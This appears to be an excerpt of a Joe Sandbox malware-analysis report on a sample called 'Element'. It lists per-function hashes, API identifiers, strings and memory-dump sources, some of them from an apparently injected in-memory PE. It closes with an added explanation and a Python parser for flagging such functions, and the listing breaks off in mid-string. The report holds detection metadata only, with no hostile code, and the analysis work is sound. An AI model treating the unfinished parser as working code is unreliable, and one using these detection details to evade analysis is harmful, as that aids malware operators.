                    • Instruction ID: d02fc10042453c2346d0b13b333ba6f513a5572e60712dcfdd17471c6f47a07d
                    • Opcode Fuzzy Hash: e2e9213b78b4f48b5e10b874a45c93fabeb8d2a14b92d34ea69f29d604c5b26d
                    • Instruction Fuzzy Hash: 3341B272A14B8091FA10DB24E4653EEA360E7F5794F40A311EE98036ABEF7CC2C5C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: FileFindHeaderInstanceTargetType
                    • String ID: Bad dynamic_cast!
                    • API String ID: 746355257-2956939130
                    • Opcode ID: 63163e2199a9d6734fc46efa35c0aac2ed02f89aa03512a238a1aec24ed52471
                    • Instruction ID: 0f342e86b94525148b5a810607fd71fa8f1a13cd36259066bdf37017013fc515
                    • Opcode Fuzzy Hash: 63163e2199a9d6734fc46efa35c0aac2ed02f89aa03512a238a1aec24ed52471
                    • Instruction Fuzzy Hash: 6C419136311694B6FB64CF61E8B97EA63A0F764B85F108525DE4A03B54DB38C583CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ErrorFileLastWrite
                    • String ID: U
                    • API String ID: 442123175-4171548499
                    • Opcode ID: 30b4d7d095d87f84c7f08717494d4c8f3d56669b1d1bb515c8f0b6c2cb0432c9
                    • Instruction ID: 56195e9e2e2647eeb139766e3742f1c6d23cc572970ffc153c2815573e9bcb0c
                    • Opcode Fuzzy Hash: 30b4d7d095d87f84c7f08717494d4c8f3d56669b1d1bb515c8f0b6c2cb0432c9
                    • Instruction Fuzzy Hash: EE41B572715A8092FB609F25E8687DAB7A0F3A8794F854025EE4D87798EF3CC486C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$CreateDestroyMessageObjectSendStock
                    • String ID: static
                    • API String ID: 3467290483-2160076837
                    • Opcode ID: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                    • Instruction ID: 40e9def159f593a54971a66e44af8bea1c4ee610e73e24744303e07c0871c619
                    • Opcode Fuzzy Hash: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                    • Instruction Fuzzy Hash: 0F411E365086D2C6D6709F25E8407AFB7A5FB84B91F104235DBE947A9AEF3CD881CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _snwprintf
                    • String ID: , $$AUTOITCALLVARIABLE%d
                    • API String ID: 3988819677-2584243854
                    • Opcode ID: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
                    • Instruction ID: db64d5beb9a9e7b9e68d740dfe113d543afebde5703d4e360eef73cd08a79986
                    • Opcode Fuzzy Hash: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
                    • Instruction Fuzzy Hash: 98315C76B09B9295EB10DF64E8411EC2375BB44F85B8040B2DA9D9779ACF38E90AC340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$CreateMessageObjectSendStock
                    • String ID: $SysTabControl32
                    • API String ID: 2080134422-3143400907
                    • Opcode ID: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                    • Instruction ID: 9d2679e77b5313fcdebfc4c1dc959f30abcb59558e202d9c956aeef32bb69a5c
                    • Opcode Fuzzy Hash: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                    • Instruction Fuzzy Hash: 74315A325087C1CAE760CF15A84479AB7A5F785BA5F144339EAA857AE9CF3CD841CF40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: FileHandleType
                    • String ID: @
                    • API String ID: 3000768030-2766056989
                    • Opcode ID: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                    • Instruction ID: 4cb4fc6407832dcb6dda5989d3564c3aaa0d374a4a93b692475025be2b1f1b29
                    • Opcode Fuzzy Hash: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                    • Instruction Fuzzy Hash: 7E214122A0AAA281FB648F249C941392691EB45F75F281335D6FE877D4CF39DC82D341
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: void$void
                    • API String ID: 2943138195-3746155364
                    • Opcode ID: 6f5aee4cacbc6fe246ca5ab2d30f2c4937b5b7cecb382518a965138d612b9134
                    • Instruction ID: 08202524a9932c6aad022f9e8e3fcdbe43a70ef826e6daac4f15a9f3546736b1
                    • Opcode Fuzzy Hash: 6f5aee4cacbc6fe246ca5ab2d30f2c4937b5b7cecb382518a965138d612b9134
                    • Instruction Fuzzy Hash: 5F317E72B11B54B9FB01DFA4E8742EC37B4B758748F844526EE4953B59DB3881C6CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                    • Instruction ID: 0da8f1b8d394a5dec7f9c3b9023388de5a60ac89dc5df511761f7d215041fc94
                    • Opcode Fuzzy Hash: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                    • Instruction Fuzzy Hash: 4C310A36A087C58BD364CF25E844B5AB7A5F788B50F144269EB9983B99CF38E851CF40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Combobox
                    • API String ID: 1025951953-2096851135
                    • Opcode ID: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                    • Instruction ID: d2313b0b0f167d5506d9aa99e9c951544b81201838fb7cecf45afa0bd7e39ec7
                    • Opcode Fuzzy Hash: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                    • Instruction Fuzzy Hash: 35314A326097C1CAE3708F25A844B5AB7A5F7887A1F504235EAE943B99CF3CD845CF40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                    • Instruction ID: 9bf4f3512f551e9505aec7f65888f3d3189c4072c5cb712d1a1a2157da95e0bd
                    • Opcode Fuzzy Hash: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                    • Instruction Fuzzy Hash: 3F310936A087C18AE760CF15A84475AB7A5F788BA1F144235EAAC83B99DF3CD845CF41
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _handle_error
                    • String ID: "$pow
                    • API String ID: 1757819995-713443511
                    • Opcode ID: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                    • Instruction ID: a84861939ad4f098c9fd3df2b47e419f32306baec2f6fecbc5e9af42e96573f2
                    • Opcode Fuzzy Hash: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                    • Instruction Fuzzy Hash: 1E215E76D1CAD487E370CF10E84067AAAA0FBDA745F201325F7C946998DFBDD5419B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ExceptionFileHeaderRaise
                    • String ID: csm
                    • API String ID: 2573137834-1018135373
                    • Opcode ID: b7f0bf24e24089b3b6b2a80f99f4933534a93aae09fc32197e4a578997ebfa6a
                    • Instruction ID: edf7a48ea9c45467f121370e7894867645139fd7f193e61000eb579df35c7e60
                    • Opcode Fuzzy Hash: b7f0bf24e24089b3b6b2a80f99f4933534a93aae09fc32197e4a578997ebfa6a
                    • Instruction Fuzzy Hash: 6E112B36618B4092EB618F25F46439A77E5F798B88F584220DF8D07758EF3DC592CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3712363035-3916222277
                    • Opcode ID: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
                    • Instruction ID: 65ff2631515d61e7b349d9eb280eb897c88238155d01cda985917ddb64806ce3
                    • Opcode Fuzzy Hash: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
                    • Instruction Fuzzy Hash: 46115231A0C78186E7508F16FD4426AB7A5FB84B81F055135EACDC7A6ACF3DD858CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _ctrlfp_handle_error_raise_exc
                    • String ID: !$tan
                    • API String ID: 3384550415-2428968949
                    • Opcode ID: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                    • Instruction ID: 1b57da7b77b2a826f991b61673cd24e8afa13753bbe65d6f99edee02493057e3
                    • Opcode Fuzzy Hash: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                    • Instruction Fuzzy Hash: AF01B931E19B8541DA14DF12AC0033A61A6FF9ABD4F505334E99D0BB84EF7CD5408B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Xinvalid_argument__std_exception_copystd::_
                    • String ID: map/set too long
                    • API String ID: 2536225881-558153379
                    • Opcode ID: 3071485586bbb77e1dbe4cab80e9d37afc6a8a7c0296d48938d2cf686b89d60a
                    • Instruction ID: c227003fd7d67fa3a337e359f2037bee1a5001882d4fde122d2807962f0c75b0
                    • Opcode Fuzzy Hash: 3071485586bbb77e1dbe4cab80e9d37afc6a8a7c0296d48938d2cf686b89d60a
                    • Instruction Fuzzy Hash: 35E06D71A11B04A0FB01AF21E8B42D86360D738754F98D222DD5C46361EA38D5E6C300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _ctrlfp_handle_error_raise_exc
                    • String ID: !$sin
                    • API String ID: 3384550415-1565623160
                    • Opcode ID: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                    • Instruction ID: 1778d53702e03a2dac7e0748cff55df39ed7aa1856bededf1e3811c5c88fed36
                    • Opcode Fuzzy Hash: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                    • Instruction Fuzzy Hash: 55018872E19BC941D614DF12AC4037A6162BF9ABD4F504334E99D1ABD4EF7CD5414700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _ctrlfp_handle_error_raise_exc
                    • String ID: !$cos
                    • API String ID: 3384550415-1949035351
                    • Opcode ID: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                    • Instruction ID: 253ece822fcc6254754441b78048024f7d147b22324a8f30f7dcfd569a3566e0
                    • Opcode Fuzzy Hash: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                    • Instruction Fuzzy Hash: CF01D472E19B8982DA14DF22AC0037A6162BF9ABD4F504334E99D1ABC9EF7CD4418B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _handle_error
                    • String ID: "$exp
                    • API String ID: 1757819995-2878093337
                    • Opcode ID: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                    • Instruction ID: cf014a627410cf2688e2fd8edd2e459e6622e9ec56f4488208709af3416202c6
                    • Opcode Fuzzy Hash: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                    • Instruction Fuzzy Hash: 5701DB3A929B9883E720CF24D8492AA7771FFEA705F201315E7841A664DB7DD4819F00
                    APIs
                    • try_get_function.LIBVCRUNTIME ref: 00007FF6C5897479
                    • TlsSetValue.KERNEL32(?,?,?,00007FF6C58970D1,?,?,?,?,00007FF6C589649C,?,?,?,?,00007FF6C5894B1B), ref: 00007FF6C5897490
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Valuetry_get_function
                    • String ID: FlsSetValue
                    • API String ID: 738293619-3750699315
                    • Opcode ID: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                    • Instruction ID: e149ee9bd74a5445f79ca7cfb20edbccc82079d284b4e06ee68cd79057decd61
                    • Opcode Fuzzy Hash: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                    • Instruction Fuzzy Hash: CAE06DA2A0968282EF185F51FC484B92261AF48F96F484072D99D862A7CF3CEC94C250
                    APIs
                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6C5895471
                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF6C5895482
                      • Part of subcall function 00007FF6C5896EA8: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6C5895487), ref: 00007FF6C5896F1D
                      • Part of subcall function 00007FF6C5896EA8: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6C5895487), ref: 00007FF6C5896F4F
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                    • String ID: Unknown exception
                    • API String ID: 3561508498-410509341
                    • Opcode ID: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                    • Instruction ID: 3c484dd52a77411c01a94ceb174d760e74c99821592aa9a55220a28305e0577c
                    • Opcode Fuzzy Hash: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                    • Instruction Fuzzy Hash: E7D01722A19A8691DF10EF00DC943A97334FB80B0AFE04531E18CC15B6DF2CDE4AC300
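The records above come in two flavours that matter to an analyst: most functions were lifted from the image-backed dump at 00007FF6C5870000 (with a set of associated section dumps), while a few (for example the `map/set too long` and `csm` functions) were lifted from the dump at 0000021925C50000, which is marked `based on PE: true` but has no associated module dumps. Separating the two tells you which functions belong to the on-disk executable and which belong to a PE that only existed in memory. The following parser is an added example, not part of the Joe Sandbox report or its tooling: it reads records in exactly the block format printed above and flags functions whose source dump is private, executable-and-writable memory. The input is an excerpt constructed from two records on this page. The interpretation of the dotted `.sdmp` filename fields (process index, phase, dump id, base, protection, type) is an assumption; the page does not document that layout, only the numeric Win32 memory constants are known values.

```python
"""Parse Joe Sandbox per-function records (the block format shown above) and
flag functions disassembled from private RWX memory instead of the file-backed
image. Added example, not part of the report."""
import re
from dataclasses import dataclass, field

# Constructed excerpt: two records copied from the listing above, with the
# "Download File" link text dropped.
SAMPLE = """\
APIs
• try_get_function.LIBVCRUNTIME ref: 00007FF6C5897479
• TlsSetValue.KERNEL32(?,?,?,00007FF6C58970D1,?,?,?,?,00007FF6C589649C,?,?,?,?,00007FF6C5894B1B), ref: 00007FF6C5897490
Strings
Memory Dump Source
• Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
• Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
Similarity
• API ID: Valuetry_get_function
• String ID: FlsSetValue
• API String ID: 738293619-3750699315
• Instruction Fuzzy Hash: CAE06DA2A0968282EF185F51FC484B92261AF48F96F484072D99D862A7CF3CEC94C250
APIs
Strings
Memory Dump Source
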